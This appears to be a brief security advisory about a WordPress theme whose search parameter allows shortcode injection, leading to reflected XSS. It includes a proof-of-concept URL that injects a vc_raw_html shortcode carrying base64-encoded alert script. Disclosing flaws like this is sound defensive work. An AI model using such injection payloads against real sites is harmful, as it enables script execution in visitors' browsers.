The theme could allow arbitrary shortcode to be injected when the “Display results from blog” settings is enabled, which could lead to Reflected XSS for example, when using a shortcode vulnerable to XSS
When the “Display results from blog” settings is enabled: https://example.com/?s=][vc_raw_html]PHNjcmlwdD5hbGVydChgRmVhclp6WnpgKTs8L3NjcmlwdD4=[/vc_raw_html][audio%20&post;_type=product&product;_cat=lighting